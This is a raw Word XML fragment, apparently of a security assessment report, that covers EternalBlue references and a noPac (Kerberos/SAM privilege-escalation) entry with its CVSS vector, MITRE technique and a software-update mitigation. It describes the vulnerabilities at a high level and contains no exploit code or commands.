          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> internal</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 xml:space="preserve"> network segments, allowing communication only between machines and subnets that have a legitimate </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="243263B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>need for SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="092899B3" w14:textId="412E2F5F">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5CA39601" w:rsidP="0D325B6E" w:rsidRDefault="5CA39601" w14:paraId="6BB1EDCF" w14:textId="1C80B9F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A3960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EEDAEC3" w:rsidP="0D325B6E" w:rsidRDefault="7EEDAEC3" w14:paraId="16FB65F5" w14:textId="46DE6F0A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rf7276996cdcf4fbc">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="7EEDAEC3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SentinelOne - EternalBlue Security Primer</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="68FEC3A1" w:rsidP="0D325B6E" w:rsidRDefault="68FEC3A1" w14:paraId="17D9D590" w14:textId="636CEF42">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R009108e96b7a478c">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="68FEC3A1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>NIST - CVE</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="4A0C6188">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-2017-0144</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4A0C6188">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3ACFB100" w14:textId="47B16641">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4FEC779D" w14:textId="105B8489">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="102C72CE" w:rsidP="0D325B6E" w:rsidRDefault="102C72CE" w14:paraId="1EA71CA7" w14:textId="1E9409B8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc108362876" w:id="1304780085"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="102C72CE">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="660000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="102C72CE">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">C1: </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc2133782985" w:id="1094795724"/>
      <w:bookmarkStart w:name="_Toc848668014" w:id="2130211783"/>
      <w:bookmarkStart w:name="_Toc1457702429" w:id="1916809379"/>
      <w:bookmarkStart w:name="_Toc1009261394" w:id="495001853"/>
      <w:bookmarkStart w:name="_Toc1107717499" w:id="899801330"/>
      <w:bookmarkStart w:name="_Toc900331423" w:id="179853544"/>
      <w:bookmarkStart w:name="_Toc1022859445" w:id="1294458567"/>
      <w:bookmarkStart w:name="_Toc206301568" w:id="14059802"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0969DBB9">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1180F4D6">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>oPac</w:t>
      </w:r>
      <w:bookmarkEnd w:id="179853544"/>
      <w:bookmarkEnd w:id="1294458567"/>
      <w:bookmarkEnd w:id="14059802"/>
      <w:bookmarkEnd w:id="1094795724"/>
      <w:bookmarkEnd w:id="2130211783"/>
      <w:bookmarkEnd w:id="1916809379"/>
      <w:bookmarkEnd w:id="495001853"/>
      <w:bookmarkEnd w:id="899801330"/>
      <w:bookmarkEnd w:id="130478008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3B72592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240A2E" w14:textId="423F3AE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433B50" w14:textId="1EF4204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236126" w14:textId="4DE6E15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393E45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8CE82F" w14:textId="15BFA3BB">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26AF8045" w14:textId="1BB74105">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71123D28" w:rsidP="0D325B6E" w:rsidRDefault="71123D28" w14:paraId="4005E067" w14:textId="02327DEF">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71123D28">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>9.</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="15200F86">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A06759D" w14:textId="0C78CA95">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49A46AF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7EA135" w14:textId="691E07D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53831DA" w14:textId="2C313E5D">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3237484"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4350" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="462F1A48"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3AB378F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F5B6D8" w14:textId="37C889A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CD7C5E" w:rsidP="0D325B6E" w:rsidRDefault="26CD7C5E" w14:paraId="3CFC07AA" w14:textId="59CD7F21">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" r:id="Re3652ffc91824a72">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="26CD7C5E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:L</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="26CD7C5E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="26CD7C5E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AC:L</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="26CD7C5E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="26CD7C5E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AT:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="26CD7C5E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="26CD7C5E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>PR:L</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="26CD7C5E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="26CD7C5E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>UI:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="26CD7C5E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="26CD7C5E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VC:</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r w:rsidRPr="0D325B6E" w:rsidR="26CD7C5E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VI:</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r w:rsidRPr="0D325B6E" w:rsidR="26CD7C5E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VA:</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r w:rsidRPr="0D325B6E" w:rsidR="26CD7C5E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SC:</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r w:rsidRPr="0D325B6E" w:rsidR="26CD7C5E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SI:</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r w:rsidRPr="0D325B6E" w:rsidR="26CD7C5E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SA:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="26CD7C5E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="2AABFF41">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3E8045" w14:textId="0F9D798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9F7158C" w:rsidP="0D325B6E" w:rsidRDefault="49F7158C" w14:paraId="5E136984" w14:textId="3CEFC8E3">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49F7158C">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0F1A878" w14:textId="259C78ED">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R9eeadc5e3f5e4910">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="10EC66FB">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>1068</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="31AC6922">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="188B5C60">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Exploitation for Privilege Escalation</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4F47F3F7">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DCB1801"/>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0915684" w:rsidP="0D325B6E" w:rsidRDefault="00915684" w14:paraId="3A5B99CA" w14:textId="53FD24F2">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091568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7E063E7" w:rsidP="0D325B6E" w:rsidRDefault="57E063E7" w14:paraId="65AE6E60" w14:textId="5FB0D2D5">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R3715b9994dda48bb">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="57E063E7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1051: Update Software</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="2482FEF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7AE0DDF" w14:textId="3A30E3A2">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A9C4EC5" w14:textId="0B676344">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C57207E" w14:textId="3FBE32C0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="71CCCF81" w:rsidP="0D325B6E" w:rsidRDefault="71CCCF81" w14:paraId="091E88CC" w14:textId="1B7400C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1CCCF8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5125189" w:rsidP="0D325B6E" w:rsidRDefault="15125189" w14:paraId="5445B6F5" w14:textId="60A1C37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5125189">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with access to any standard domain user can elevate their privileges to Domain Administrator by </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="15125189">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">exploiting flaws in the Kerberos protocol and the Security Account Manager (SAM) </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5BF26620">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">due to an issue </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="15125189">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
